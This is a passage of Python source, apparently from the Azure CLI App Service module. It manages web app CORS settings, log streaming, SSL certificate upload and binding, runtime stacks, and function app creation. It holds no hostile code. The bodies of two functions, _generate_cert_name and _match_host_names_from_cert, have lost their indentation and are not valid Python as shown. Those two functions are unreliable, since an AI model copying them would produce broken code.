    set_traffic_routing(cmd, resource_group_name, name, [])
def add_cors(cmd, resource_group_name, name, allowed_origins, slot=None):
    """Append origins to the CORS allow-list of a web app (or slot)."""
    from azure.mgmt.web.models import CorsSettings
    configs = get_site_configs(cmd, resource_group_name, name, slot)
    if not configs.cors:
        configs.cors = CorsSettings()
    existing = configs.cors.allowed_origins or []
    configs.cors.allowed_origins = existing + allowed_origins
    result = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_configuration', slot, configs)
    return result.cors
def remove_cors(cmd, resource_group_name, name, allowed_origins, slot=None):
    """Remove origins from the CORS allow-list (clear it when none are given)."""
    configs = get_site_configs(cmd, resource_group_name, name, slot)
    if configs.cors:
        if not allowed_origins:
            configs.cors.allowed_origins = []
        else:
            remaining = [origin for origin in (configs.cors.allowed_origins or [])
                         if origin not in allowed_origins]
            configs.cors.allowed_origins = remaining
        configs = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_configuration', slot, configs)
    return configs.cors
def show_cors(cmd, resource_group_name, name, slot=None):
    """Show the CORS settings of a web app (or slot)."""
    return get_site_configs(cmd, resource_group_name, name, slot).cors
def get_streaming_log(cmd, resource_group_name, name, provider=None, slot=None):
    """Stream live logs to stdout until the user interrupts with Ctrl+C."""
    scm_url = _get_scm_url(cmd, resource_group_name, name, slot)
    streaming_url = scm_url + '/logstream'
    if provider:
        streaming_url += ('/' + provider.lstrip('/'))
    user, password = _get_site_credential(cmd.cli_ctx, resource_group_name, name, slot)
    worker = threading.Thread(target=_get_log, args=(streaming_url, user, password))
    worker.daemon = True
    worker.start()
    # keep the main thread alive in a sleep loop so Ctrl+C can stop the command
    while True:
        time.sleep(100)
def download_historical_logs(cmd, resource_group_name, name, log_file=None, slot=None):
    """Download the zipped historical logs of an app/slot to *log_file*."""
    scm_url = _get_scm_url(cmd, resource_group_name, name, slot)
    dump_url = scm_url.rstrip('/') + '/dump'
    user_name, password = _get_site_credential(cmd.cli_ctx, resource_group_name, name, slot)
    _get_log(dump_url, user_name, password, log_file)
    logger.warning('Downloaded logs to %s', log_file)
def _get_site_credential(cli_ctx, resource_group_name, name, slot=None):
    """Return the (username, password) publishing credentials of an app/slot."""
    poller = _generic_site_operation(cli_ctx, resource_group_name, name, 'list_publishing_credentials', slot)
    creds = poller.result()
    return creds.publishing_user_name, creds.publishing_password
def _get_log(url, user_name, password, log_file=None):
    """Fetch logs from *url* using basic auth.

    With *log_file* set, the response body is written to that file in 1 KiB
    chunks; otherwise the body is streamed to stdout until the server closes
    the connection. Raises CLIError on any non-200 response.
    """
    import certifi
    import urllib3
    try:
        import urllib3.contrib.pyopenssl
        urllib3.contrib.pyopenssl.inject_into_urllib3()
    except ImportError:
        pass
    http = urllib3.PoolManager(cert_reqs='CERT_REQUIRED', ca_certs=certifi.where())
    headers = urllib3.util.make_headers(basic_auth='{0}:{1}'.format(user_name, password))
    r = http.request(
        'GET',
        url,
        headers=headers,
        preload_content=False
    )
    try:
        if r.status != 200:
            raise CLIError("Failed to connect to '{}' with status code '{}' and reason '{}'".format(
                url, r.status, r.reason))
        if log_file:  # download logs
            with open(log_file, 'wb') as f:
                while True:
                    data = r.read(1024)
                    if not data:
                        break
                    f.write(data)
        else:  # streaming
            std_encoding = sys.stdout.encoding
            for chunk in r.stream():
                if chunk:
                    # Extra encode() and decode for stdout which does not support 'utf-8'
                    print(chunk.decode(encoding='utf-8', errors='replace')
                          .encode(std_encoding, errors='replace')
                          .decode(std_encoding, errors='replace'), end='')  # each line of log has CRLF.
    finally:
        # Fix: always return the connection to the pool — the original leaked
        # it when the non-200 CLIError path was taken.
        r.release_conn()
def upload_ssl_cert(cmd, resource_group_name, name, certificate_password, certificate_file, slot=None):
    """Upload a .pfx certificate and register it for the app.

    The certificate resource name is derived from its thumbprint, hosting
    environment, location and resource group (see _generate_cert_name).
    """
    Certificate = cmd.get_models('Certificate')
    client = web_client_factory(cmd.cli_ctx)
    webapp = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
    # Fix: read the pfx with a context manager so the handle is always closed
    # (the original left the file object open).
    with open(certificate_file, 'rb') as cert_file:
        cert_contents = cert_file.read()
    hosting_environment_profile_param = (webapp.hosting_environment_profile.name
                                         if webapp.hosting_environment_profile else '')
    thumb_print = _get_cert(certificate_password, certificate_file)
    cert_name = _generate_cert_name(thumb_print, hosting_environment_profile_param,
                                    webapp.location, resource_group_name)
    cert = Certificate(password=certificate_password, pfx_blob=cert_contents,
                       location=webapp.location, server_farm_id=webapp.server_farm_id)
    return client.certificates.create_or_update(resource_group_name, cert_name, cert)
def _generate_cert_name(thumb_print, hosting_environment, location, resource_group_name):
return "%s_%s_%s_%s" % (thumb_print, hosting_environment, location, resource_group_name)
def _get_cert(certificate_password, certificate_file):
    ''' Decrypts the .pfx file and returns the certificate's SHA1 thumbprint. '''
    # Fix: open the pfx via a context manager so the handle is closed
    # (the original leaked the open file object).
    with open(certificate_file, 'rb') as f:
        p12 = OpenSSL.crypto.load_pkcs12(f.read(), certificate_password)
    cert = p12.get_certificate()
    digest_algorithm = 'sha1'
    # digest() yields b'AB:CD:...'; strip the separators to match ARM's format
    thumbprint = cert.digest(digest_algorithm).decode("utf-8").replace(':', '')
    return thumbprint
def list_ssl_certs(cmd, resource_group_name):
    """List the App Service certificates in a resource group."""
    return web_client_factory(cmd.cli_ctx).certificates.list_by_resource_group(resource_group_name)
def delete_ssl_cert(cmd, resource_group_name, certificate_thumbprint):
    """Delete the first certificate in the group whose thumbprint matches."""
    client = web_client_factory(cmd.cli_ctx)
    match = next((c for c in client.certificates.list_by_resource_group(resource_group_name)
                  if c.thumbprint == certificate_thumbprint), None)
    if match is None:
        raise CLIError("Certificate for thumbprint '{}' not found".format(certificate_thumbprint))
    return client.certificates.delete(resource_group_name, match.name)
def import_ssl_cert(cmd, resource_group_name, name, key_vault, key_vault_certificate_name):
    """Import a Key Vault certificate into the web app's resource group.

    *key_vault* may be a vault name (resolved within the current subscription)
    or a full resource id. Warns and returns None when the vault is not found.
    """
    Certificate = cmd.get_models('Certificate')
    client = web_client_factory(cmd.cli_ctx)
    webapp = client.web_apps.get(resource_group_name, name)
    if not webapp:
        raise CLIError("'{}' app doesn't exist in resource group {}".format(name, resource_group_name))
    # resolve a bare vault name to a full resource id when needed
    if is_valid_resource_id(key_vault):
        kv_id = key_vault
    else:
        kv_id = None
        kv_client = get_mgmt_service_client(cmd.cli_ctx, ResourceType.MGMT_KEYVAULT)
        for kv in kv_client.vaults.list_by_subscription():
            if key_vault == kv.name:
                kv_id = kv.id
                break
    if kv_id is None:
        kv_msg = 'The Key Vault {0} was not found in the subscription in context. ' \
                 'If your Key Vault is in a different subscription, please specify the full Resource ID: ' \
                 '\naz .. ssl import -n {1} -g {2} --key-vault-certificate-name {3} ' \
                 '--key-vault /subscriptions/[sub id]/resourceGroups/[rg]/providers/Microsoft.KeyVault/' \
                 'vaults/{0}'.format(key_vault, name, resource_group_name, key_vault_certificate_name)
        logger.warning(kv_msg)
        return
    kv_id_parts = parse_resource_id(kv_id)
    kv_name = kv_id_parts['name']
    kv_resource_group_name = kv_id_parts['resource_group']
    kv_subscription = kv_id_parts['subscription']
    cert_name = '{}-{}-{}'.format(resource_group_name, kv_name, key_vault_certificate_name)
    # best-effort permission check; proceed with a warning when it fails
    if not _check_service_principal_permissions(cmd, kv_resource_group_name, kv_name, kv_subscription):
        lnk = 'https://azure.github.io/AppService/2016/05/24/Deploying-Azure-Web-App-Certificate-through-Key-Vault.html'
        logger.warning('Unable to verify Key Vault permissions.')
        logger.warning('You may need to grant Microsoft.Azure.WebSites service principal the Secret:Get permission')
        logger.warning('Find more details here: {}'.format(lnk))
    kv_cert_def = Certificate(location=webapp.location, key_vault_id=kv_id, password='',
                              key_vault_secret_name=key_vault_certificate_name,
                              server_farm_id=webapp.server_farm_id)
    return client.certificates.create_or_update(name=cert_name, resource_group_name=resource_group_name,
                                                certificate_envelope=kv_cert_def)
def create_managed_ssl_cert(cmd, resource_group_name, name, hostname, slot=None):
    """Create a free App Service managed certificate for a bound hostname."""
    Certificate = cmd.get_models('Certificate')
    hostname = hostname.lower()
    client = web_client_factory(cmd.cli_ctx)
    webapp = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
    if not webapp:
        slot_text = "Deployment slot {} in ".format(slot) if slot else ''
        raise CLIError("{0}app {1} doesn't exist in resource group {2}".format(slot_text, name, resource_group_name))
    parsed_plan_id = parse_resource_id(webapp.server_farm_id)
    plan_info = client.app_service_plans.get(parsed_plan_id['resource_group'], parsed_plan_id['name'])
    # managed certificates require a paid tier
    if plan_info.sku.tier.upper() in ('FREE', 'SHARED'):
        raise CLIError('Managed Certificate is not supported on Free and Shared tier.')
    if not _verify_hostname_binding(cmd, resource_group_name, name, hostname, slot):
        slot_text = " --slot {}".format(slot) if slot else ""
        raise CLIError("Hostname (custom domain) '{0}' is not registered with {1}. "
                       "Use 'az webapp config hostname add --resource-group {2} "
                       "--webapp-name {1}{3} --hostname {0}' "
                       "to register the hostname.".format(hostname, name, resource_group_name, slot_text))
    easy_cert_def = Certificate(location=webapp.location, canonical_name=hostname,
                                server_farm_id=webapp.server_farm_id, password='')
    return client.certificates.create_or_update(name=hostname, resource_group_name=resource_group_name,
                                                certificate_envelope=easy_cert_def)
def _check_service_principal_permissions(cmd, resource_group_name, key_vault_name, key_vault_subscription):
    """Best-effort check that the App Service SP has the Secret:Get permission
    on the vault. Returns False when the vault is in another subscription."""
    from azure.cli.command_modules.keyvault._client_factory import keyvault_client_vaults_factory
    from azure.cli.command_modules.role._client_factory import _graph_client_factory
    from azure.graphrbac.models import GraphErrorException
    from azure.cli.core.commands.client_factory import get_subscription_id
    # cannot inspect a vault that lives in another subscription
    if get_subscription_id(cmd.cli_ctx) != key_vault_subscription:
        return False
    kv_client = keyvault_client_vaults_factory(cmd.cli_ctx, None)
    vault = kv_client.get(resource_group_name=resource_group_name, vault_name=key_vault_name)
    # well-known app ids of the Microsoft.Azure.WebSites service principal
    websites_app_ids = ('abfa0a7c-a6b6-4736-8310-5855508787cd',  # public cloud
                        '6a02c803-dafd-4136-b4c3-5a6f318b4714')  # government cloud
    graph_sp_client = _graph_client_factory(cmd.cli_ctx).service_principals
    for policy in vault.properties.access_policies:
        try:
            sp = graph_sp_client.get(policy.object_id)
            if sp.app_id in websites_app_ids and "Get" in policy.permissions.secrets:
                return True
        except GraphErrorException:
            pass  # Lookup will fail for non service principals (users, groups, etc.)
    return False
def _update_host_name_ssl_state(cmd, resource_group_name, webapp_name, webapp,
                                host_name, ssl_state, thumbprint, slot=None):
    """Flip the SSL binding state of one hostname on the given app/slot."""
    Site, HostNameSslState = cmd.get_models('Site', 'HostNameSslState')
    binding = HostNameSslState(name=host_name,
                               ssl_state=ssl_state,
                               thumbprint=thumbprint,
                               to_update=True)
    updated_webapp = Site(host_name_ssl_states=[binding],
                          location=webapp.location, tags=webapp.tags)
    return _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name, 'create_or_update',
                                   slot, updated_webapp)
def _update_ssl_binding(cmd, resource_group_name, name, certificate_thumbprint, ssl_type, slot=None):
    """Bind/unbind the certificate with the given thumbprint to matching hostnames."""
    client = web_client_factory(cmd.cli_ctx)
    webapp = client.web_apps.get(resource_group_name, name)
    if not webapp:
        raise CLIError("'{}' app doesn't exist".format(name))
    # certificates live in the plan's resource group, not necessarily the app's
    cert_resource_group_name = parse_resource_id(webapp.server_farm_id)['resource_group']
    for webapp_cert in client.certificates.list_by_resource_group(cert_resource_group_name):
        if webapp_cert.thumbprint != certificate_thumbprint:
            continue
        cert_hosts = webapp_cert.host_names
        if len(cert_hosts) == 1 and not cert_hosts[0].startswith('*'):
            # simple case: cert is scoped to exactly one concrete hostname
            return _update_host_name_ssl_state(cmd, resource_group_name, name, webapp,
                                               cert_hosts[0], ssl_type,
                                               certificate_thumbprint, slot)
        # wildcard / multi-domain cert: bind every webapp hostname it covers
        query_result = list_hostnames(cmd, resource_group_name, name, slot)
        hostnames_in_webapp = [x.name.split('/')[-1] for x in query_result]
        for h in _match_host_names_from_cert(cert_hosts, hostnames_in_webapp):
            _update_host_name_ssl_state(cmd, resource_group_name, name, webapp,
                                        h, ssl_type, certificate_thumbprint, slot)
        return show_webapp(cmd, resource_group_name, name, slot)
    raise CLIError("Certificate for thumbprint '{}' not found.".format(certificate_thumbprint))
def bind_ssl_cert(cmd, resource_group_name, name, certificate_thumbprint, ssl_type, slot=None):
    """Bind a certificate to the app using SNI or IP-based SSL."""
    SslState = cmd.get_models('SslState')
    state = SslState.sni_enabled if ssl_type == 'SNI' else SslState.ip_based_enabled
    return _update_ssl_binding(cmd, resource_group_name, name, certificate_thumbprint, state, slot)
def unbind_ssl_cert(cmd, resource_group_name, name, certificate_thumbprint, slot=None):
    """Remove the SSL binding of the certificate with the given thumbprint."""
    disabled_state = cmd.get_models('SslState').disabled
    return _update_ssl_binding(cmd, resource_group_name, name, certificate_thumbprint,
                               disabled_state, slot)
def _match_host_names_from_cert(hostnames_from_cert, hostnames_in_webapp):
# the goal is to match '*.foo.com' with host name like 'admin.foo.com', 'logs.foo.com', etc
matched = set()
for hostname in hostnames_from_cert:
if hostname.startswith('*'):
for h in hostnames_in_webapp:
if hostname[hostname.find('.'):] == h[h.find('.'):]:
matched.add(h)
elif hostname in hostnames_in_webapp:
matched.add(hostname)
return matched
# help class handles runtime stack in format like 'node|6.1', 'php|5.5'
class _StackRuntimeHelper:
    """Resolves runtime stack display names (e.g. 'node|6.1', 'php|5.5') to the
    site-config / app-settings changes needed to enable them.

    Stacks are loaded lazily from the bundled RUNTIME_STACKS json file; the
    live-API loader (_load_stacks) is kept but currently unused (see its
    leading comment).
    """
    def __init__(self, cmd, client, linux=False):
        self._cmd = cmd
        self._client = client
        self._linux = linux    # True -> use the linux stack list
        self._stacks = []      # lazily populated cache of stack dicts
    def resolve(self, display_name):
        """Return the stack dict whose displayName matches *display_name*
        (case-insensitive), or None when no stack matches."""
        self._load_stacks_hardcoded()
        return next((s for s in self._stacks if s['displayName'].lower() == display_name.lower()),
                    None)
    @property
    def stacks(self):
        # Lazily load, then return, every known stack for the selected OS.
        self._load_stacks_hardcoded()
        return self._stacks
    @staticmethod
    def update_site_config(stack, site_config, cmd=None):
        """Apply the stack's config key/values directly onto *site_config*."""
        for k, v in stack['configs'].items():
            setattr(site_config, k, v)
        return site_config
    @staticmethod
    def update_site_appsettings(cmd, stack, site_config):
        """Apply the stack's config key/values as app settings (node stacks)."""
        NameValuePair = cmd.get_models('NameValuePair')
        if site_config.app_settings is None:
            site_config.app_settings = []
        site_config.app_settings += [NameValuePair(name=k, value=v) for k, v in stack['configs'].items()]
        return site_config
    def _load_stacks_hardcoded(self):
        """Populate self._stacks from the bundled RUNTIME_STACKS json file.

        No-op when the cache is already populated.
        """
        if self._stacks:
            return
        result = []
        if self._linux:
            result = get_file_json(RUNTIME_STACKS)['linux']
        else:  # Windows stacks
            result = get_file_json(RUNTIME_STACKS)['windows']
        for r in result:
            # node stacks are enabled via app settings; everything else via site config
            r['setter'] = (_StackRuntimeHelper.update_site_appsettings if 'node' in
                           r['displayName'] else _StackRuntimeHelper.update_site_config)
        self._stacks = result
    # Currently using hardcoded values instead of this function. This function calls the stacks API;
    # Stacks API is updated with Antares deployments,
    # which are infrequent and don't line up with stacks EOL schedule.
    def _load_stacks(self):
        """Populate self._stacks from the live provider stacks API (unused)."""
        if self._stacks:
            return
        os_type = ('Linux' if self._linux else 'Windows')
        raw_stacks = self._client.provider.get_available_stacks(os_type_selected=os_type, raw=True)
        bytes_value = raw_stacks._get_next().content  # pylint: disable=protected-access
        json_value = bytes_value.decode('utf8')
        json_stacks = json.loads(json_value)
        stacks = json_stacks['value']
        result = []
        if self._linux:
            # linux: one entry per default (or sole) minor version
            for properties in [(s['properties']) for s in stacks]:
                for major in properties['majorVersions']:
                    default_minor = next((m for m in (major['minorVersions'] or []) if m['isDefault']),
                                         None)
                    result.append({
                        'displayName': (default_minor['runtimeVersion']
                                        if default_minor else major['runtimeVersion'])
                    })
        else:  # Windows stacks
            # map stack name -> the site-config property that selects its version
            config_mappings = {
                'node': 'WEBSITE_NODE_DEFAULT_VERSION',
                'python': 'python_version',
                'php': 'php_version',
                'aspnet': 'net_framework_version'
            }
            # get all stack version except 'java'
            for stack in stacks:
                if stack['name'] not in config_mappings:
                    continue
                name, properties = stack['name'], stack['properties']
                for major in properties['majorVersions']:
                    default_minor = next((m for m in (major['minorVersions'] or []) if m['isDefault']),
                                         None)
                    result.append({
                        'displayName': name + '|' + major['displayVersion'],
                        'configs': {
                            config_mappings[name]: (default_minor['runtimeVersion']
                                                    if default_minor else major['runtimeVersion'])
                        }
                    })
            # deal with java, which pairs with java container version
            java_stack = next((s for s in stacks if s['name'] == 'java'))
            java_container_stack = next((s for s in stacks if s['name'] == 'javaContainers'))
            for java_version in java_stack['properties']['majorVersions']:
                for fx in java_container_stack['properties']['frameworks']:
                    for fx_version in fx['majorVersions']:
                        result.append({
                            'displayName': 'java|{}|{}|{}'.format(java_version['displayVersion'],
                                                                  fx['display'],
                                                                  fx_version['displayVersion']),
                            'configs': {
                                'java_version': java_version['runtimeVersion'],
                                'java_container': fx['name'],
                                'java_container_version': fx_version['runtimeVersion']
                            }
                        })
        for r in result:
            # same setter rule as the hardcoded loader
            r['setter'] = (_StackRuntimeHelper.update_site_appsettings if 'node' in
                           r['displayName'] else _StackRuntimeHelper.update_site_config)
        self._stacks = result
def get_app_insights_key(cli_ctx, resource_group, name):
    """Return the instrumentation key of an Application Insights component."""
    appinsights_client = get_mgmt_service_client(cli_ctx, ApplicationInsightsManagementClient)
    component = appinsights_client.components.get(resource_group, name)
    if component is None or component.instrumentation_key is None:
        raise CLIError("App Insights {} under resource group {} was not found.".format(name, resource_group))
    return component.instrumentation_key
def create_functionapp_app_service_plan(cmd, resource_group_name, name, is_linux, sku,
                                        number_of_workers=None, max_burst=None, location=None, tags=None):
    """Create or update an App Service plan suitable for function apps."""
    SkuDescription, AppServicePlan = cmd.get_models('SkuDescription', 'AppServicePlan')
    sku = _normalize_sku(sku)
    tier = get_sku_name(sku)
    # --max-burst only makes sense on Elastic Premium plans
    if max_burst is not None:
        if tier.lower() != "elasticpremium":
            raise CLIError("Usage error: --max-burst is only supported for Elastic Premium (EP) plans")
        max_burst = validate_range_of_int_flag('--max-burst', max_burst, min_val=0, max_val=20)
    if number_of_workers is not None:
        number_of_workers = validate_range_of_int_flag('--number-of-workers / --min-elastic-worker-count',
                                                       number_of_workers, min_val=0, max_val=20)
    client = web_client_factory(cmd.cli_ctx)
    if location is None:
        location = _get_location_from_resource_group(cmd.cli_ctx, resource_group_name)
    plan_def = AppServicePlan(location=location, tags=tags,
                              sku=SkuDescription(tier=tier, name=sku, capacity=number_of_workers),
                              reserved=(is_linux or None), maximum_elastic_worker_count=max_burst,
                              hyper_v=None, name=name)
    return client.app_service_plans.create_or_update(resource_group_name, name, plan_def)
def is_plan_consumption(cmd, plan_info):
    """True when *plan_info* is an AppServicePlan on the consumption (Dynamic) tier."""
    SkuDescription, AppServicePlan = cmd.get_models('SkuDescription', 'AppServicePlan')
    return (isinstance(plan_info, AppServicePlan) and
            isinstance(plan_info.sku, SkuDescription) and
            plan_info.sku.tier.lower() == 'dynamic')
def is_plan_elastic_premium(cmd, plan_info):
    """True when *plan_info* is an AppServicePlan on the Elastic Premium tier.

    Fix: compare the tier case-insensitively, consistent with
    is_plan_consumption — the original exact match ('ElasticPremium') would
    miss any casing variant of the tier string.
    """
    SkuDescription, AppServicePlan = cmd.get_models('SkuDescription', 'AppServicePlan')
    if isinstance(plan_info, AppServicePlan):
        if isinstance(plan_info.sku, SkuDescription):
            return plan_info.sku.tier.lower() == 'elasticpremium'
    return False
def validate_and_convert_to_int(flag, val):
    """Parse *val* as an int; raise a usage CLIError naming *flag* otherwise."""
    try:
        parsed = int(val)
    except ValueError:
        raise CLIError("Usage error: {} is expected to have an int value.".format(flag))
    return parsed
def validate_range_of_int_flag(flag_name, value, min_val, max_val):
    """Parse *value* as int and require min_val <= value <= max_val (inclusive)."""
    value = validate_and_convert_to_int(flag_name, value)
    if not min_val <= value <= max_val:
        raise CLIError("Usage error: {} is expected to be between {} and {} (inclusive)".format(flag_name, min_val,
                                                                                                max_val))
    return value
def create_function(cmd, resource_group_name, name, storage_account, plan=None,
                    os_type=None, functions_version=None, runtime=None, runtime_version=None,
                    consumption_plan_location=None, app_insights=None, app_insights_key=None,
                    disable_app_insights=None, deployment_source_url=None,
                    deployment_source_branch='master', deployment_local_git=None,
                    docker_registry_server_password=None, docker_registry_server_user=None,
                    deployment_container_image_name=None, tags=None, assign_identities=None,
                    role='Contributor', scope=None):
    """Create an Azure Function App.

    Requires exactly one of --plan / --consumption-plan-location. Validates
    the runtime and runtime version against the bundled stacks json, builds
    the Site/SiteConfig payloads (app settings, linux_fx_version, always_on,
    content-share settings), creates the app, then optionally wires up
    deployment source, Application Insights, a container image, and a
    managed identity. Returns the created functionapp object.
    """
    # pylint: disable=too-many-statements, too-many-branches
    if functions_version is None:
        logger.warning("No functions version specified so defaulting to 2. In the future, specifying a version will "
                       "be required. To create a 2.x function you would pass in the flag `--functions-version 2`")
        functions_version = '2'
    if deployment_source_url and deployment_local_git:
        raise CLIError('usage error: --deployment-source-url <url> | --deployment-local-git')
    if bool(plan) == bool(consumption_plan_location):
        raise CLIError("usage error: --plan NAME_OR_ID | --consumption-plan-location LOCATION")
    SiteConfig, Site, NameValuePair = cmd.get_models('SiteConfig', 'Site', 'NameValuePair')
    docker_registry_server_url = parse_docker_image_name(deployment_container_image_name)
    site_config = SiteConfig(app_settings=[])
    functionapp_def = Site(location=None, site_config=site_config, tags=tags)
    KEYS = FUNCTIONS_STACKS_API_KEYS()
    client = web_client_factory(cmd.cli_ctx)
    plan_info = None
    if runtime is not None:
        runtime = runtime.lower()
    # resolve location / OS from either the consumption location or the plan
    if consumption_plan_location:
        locations = list_consumption_locations(cmd)
        location = next((loc for loc in locations if loc['name'].lower() == consumption_plan_location.lower()), None)
        if location is None:
            raise CLIError("Location is invalid. Use: az functionapp list-consumption-locations")
        functionapp_def.location = consumption_plan_location
        functionapp_def.kind = 'functionapp'
        # if os_type is None, the os type is windows
        is_linux = os_type and os_type.lower() == 'linux'
    else:  # apps with SKU based plan
        if is_valid_resource_id(plan):
            parse_result = parse_resource_id(plan)
            plan_info = client.app_service_plans.get(parse_result['resource_group'], parse_result['name'])
        else:
            plan_info = client.app_service_plans.get(resource_group_name, plan)
        if not plan_info:
            raise CLIError("The plan '{}' doesn't exist".format(plan))
        location = plan_info.location
        is_linux = plan_info.reserved
        functionapp_def.server_farm_id = plan
        functionapp_def.location = location
    if functions_version == '2' and functionapp_def.location in FUNCTIONS_NO_V2_REGIONS:
        raise CLIError("2.x functions are not supported in this region. To create a 3.x function, "
                       "pass in the flag '--functions-version 3'")
    if is_linux and not runtime and (consumption_plan_location or not deployment_container_image_name):
        raise CLIError(
            "usage error: --runtime RUNTIME required for linux functions apps without custom image.")
    runtime_stacks_json = _load_runtime_stacks_json_functionapp(is_linux)
    if runtime is None and runtime_version is not None:
        raise CLIError('Must specify --runtime to use --runtime-version')
    # get the matching runtime stack object (dotnet is the default runtime)
    runtime_json = _get_matching_runtime_json_functionapp(runtime_stacks_json, runtime if runtime else 'dotnet')
    if not runtime_json:
        # no matching runtime for os
        os_string = "linux" if is_linux else "windows"
        supported_runtimes = list(map(lambda x: x[KEYS.NAME], runtime_stacks_json))
        raise CLIError("usage error: Currently supported runtimes (--runtime) in {} function apps are: {}."
                       .format(os_string, ', '.join(supported_runtimes)))
    runtime_version_json = _get_matching_runtime_version_json_functionapp(runtime_json,
                                                                          functions_version,
                                                                          runtime_version,
                                                                          is_linux)
    if not runtime_version_json:
        supported_runtime_versions = list(map(lambda x: x[KEYS.DISPLAY_VERSION],
                                              _get_supported_runtime_versions_functionapp(runtime_json,
                                                                                          functions_version)))
        if runtime_version:
            if runtime == 'dotnet':
                raise CLIError('--runtime-version is not supported for --runtime dotnet. Dotnet version is determined '
                               'by --functions-version. Dotnet version {} is not supported by Functions version {}.'
                               .format(runtime_version, functions_version))
            raise CLIError('--runtime-version {} is not supported for the selected --runtime {} and '
                           '--functions-version {}. Supported versions are: {}.'
                           .format(runtime_version,
                                   runtime,
                                   functions_version,
                                   ', '.join(supported_runtime_versions)))
        # if runtime_version was not specified, then that runtime is not supported for that functions version
        raise CLIError('no supported --runtime-version found for the selected --runtime {} and '
                       '--functions-version {}'
                       .format(runtime, functions_version))
    if runtime == 'dotnet':
        logger.warning('--runtime-version is not supported for --runtime dotnet. Dotnet version is determined by '
                       '--functions-version. Dotnet version will be %s for this function app.',
                       runtime_version_json[KEYS.DISPLAY_VERSION])
    site_config_json = runtime_version_json[KEYS.SITE_CONFIG_DICT]
    app_settings_json = runtime_version_json[KEYS.APP_SETTINGS_DICT]
    con_string = _validate_and_get_connection_string(cmd.cli_ctx, resource_group_name, storage_account)
    if is_linux:
        functionapp_def.kind = 'functionapp,linux'
        functionapp_def.reserved = True
        is_consumption = consumption_plan_location is not None
        if not is_consumption:
            site_config.app_settings.append(NameValuePair(name='MACHINEKEY_DecryptionKey',
                                                          value=str(hexlify(urandom(32)).decode()).upper()))
            if deployment_container_image_name:
                # custom container: point at the image and make the app read-only
                functionapp_def.kind = 'functionapp,linux,container'
                site_config.app_settings.append(NameValuePair(name='DOCKER_CUSTOM_IMAGE_NAME',
                                                              value=deployment_container_image_name))
                site_config.app_settings.append(NameValuePair(name='FUNCTION_APP_EDIT_MODE', value='readOnly'))
                site_config.app_settings.append(NameValuePair(name='WEBSITES_ENABLE_APP_SERVICE_STORAGE',
                                                              value='false'))
                site_config.linux_fx_version = _format_fx_version(deployment_container_image_name)
            else:
                site_config.app_settings.append(NameValuePair(name='WEBSITES_ENABLE_APP_SERVICE_STORAGE',
                                                              value='true'))
        if deployment_container_image_name is None:
            site_config.linux_fx_version = site_config_json[KEYS.LINUX_FX_VERSION]
    else:
        functionapp_def.kind = 'functionapp'
    # set site configs
    for prop, value in site_config_json.items():
        snake_case_prop = _convert_camel_to_snake_case(prop)
        setattr(site_config, snake_case_prop, value)
    # adding appsetting to site to make it a function
    for app_setting, value in app_settings_json.items():
        site_config.app_settings.append(NameValuePair(name=app_setting, value=value))
    site_config.app_settings.append(NameValuePair(name='FUNCTIONS_EXTENSION_VERSION',
                                                  value=_get_extension_version_functionapp(functions_version)))
    site_config.app_settings.append(NameValuePair(name='AzureWebJobsStorage', value=con_string))
    if disable_app_insights or not runtime_version_json[KEYS.APPLICATION_INSIGHTS]:
        site_config.app_settings.append(NameValuePair(name='AzureWebJobsDashboard', value=con_string))
    # If plan is not consumption or elastic premium, we need to set always on
    if consumption_plan_location is None and not is_plan_elastic_premium(cmd, plan_info):
        site_config.always_on = True
    # If plan is elastic premium or windows consumption, we need these app settings
    is_windows_consumption = consumption_plan_location is not None and not is_linux
    if is_plan_elastic_premium(cmd, plan_info) or is_windows_consumption:
        site_config.app_settings.append(NameValuePair(name='WEBSITE_CONTENTAZUREFILECONNECTIONSTRING',
                                                      value=con_string))
        site_config.app_settings.append(NameValuePair(name='WEBSITE_CONTENTSHARE', value=name.lower()))
    # app insights: explicit key wins, then a named component, then auto-create
    create_app_insights = False
    if app_insights_key is not None:
        site_config.app_settings.append(NameValuePair(name='APPINSIGHTS_INSTRUMENTATIONKEY',
                                                      value=app_insights_key))
    elif app_insights is not None:
        instrumentation_key = get_app_insights_key(cmd.cli_ctx, resource_group_name, app_insights)
        site_config.app_settings.append(NameValuePair(name='APPINSIGHTS_INSTRUMENTATIONKEY',
                                                      value=instrumentation_key))
    elif not disable_app_insights and runtime_version_json[KEYS.APPLICATION_INSIGHTS]:
        create_app_insights = True
    poller = client.web_apps.create_or_update(resource_group_name, name, functionapp_def)
    functionapp = LongRunningOperation(cmd.cli_ctx)(poller)
    if consumption_plan_location and is_linux:
        logger.warning("Your Linux function app '%s', that uses a consumption plan has been successfully "
                       "created but is not active until content is published using "
                       "Azure Portal or the Functions Core Tools.", name)
    else:
        _set_remote_or_local_git(cmd, functionapp, resource_group_name, name, deployment_source_url,
                                 deployment_source_branch, deployment_local_git)
    if create_app_insights:
        try:
            try_create_application_insights(cmd, functionapp)
        except Exception:  # pylint: disable=broad-except
            # best-effort: fall back to the storage-backed dashboard setting
            logger.warning('Error while trying to create and configure an Application Insights for the Function App. '
                           'Please use the Azure Portal to create and configure the Application Insights, if needed.')
            update_app_settings(cmd, functionapp.resource_group, functionapp.name,
                                ['AzureWebJobsDashboard={}'.format(con_string)])
    if deployment_container_image_name:
        update_container_settings_functionapp(cmd, resource_group_name, name, docker_registry_server_url,
                                              deployment_container_image_name, docker_registry_server_user,
                                              docker_registry_server_password)
    if assign_identities is not None:
        identity = assign_identity(cmd, resource_group_name, name, assign_identities,
                                   role, None, scope)
        functionapp.identity = identity
    return functionapp
def _load_runtime_stacks_json_functionapp(is_linux):
    """Load the bundled function-app runtime stacks definition for the given OS."""
    keys = FUNCTIONS_STACKS_API_KEYS()
    platform = 'linux' if is_linux else 'windows'
    stacks = get_file_json(FUNCTIONS_STACKS_API_JSON_PATHS[platform])
    return stacks[keys.VALUE]
def _get_matching_runtime_json_functionapp(stacks_json, runtime):
    """Return the first stack entry whose name equals *runtime*, or None."""
    keys = FUNCTIONS_STACKS_API_KEYS()
    for stack in stacks_json:
        if stack[keys.NAME] == runtime:
            return stack
    return None
def _get_supported_runtime_versions_functionapp(runtime_json, functions_version):
    """List the major-version entries of *runtime_json* that support the
    extension version implied by *functions_version*."""
    keys = FUNCTIONS_STACKS_API_KEYS()
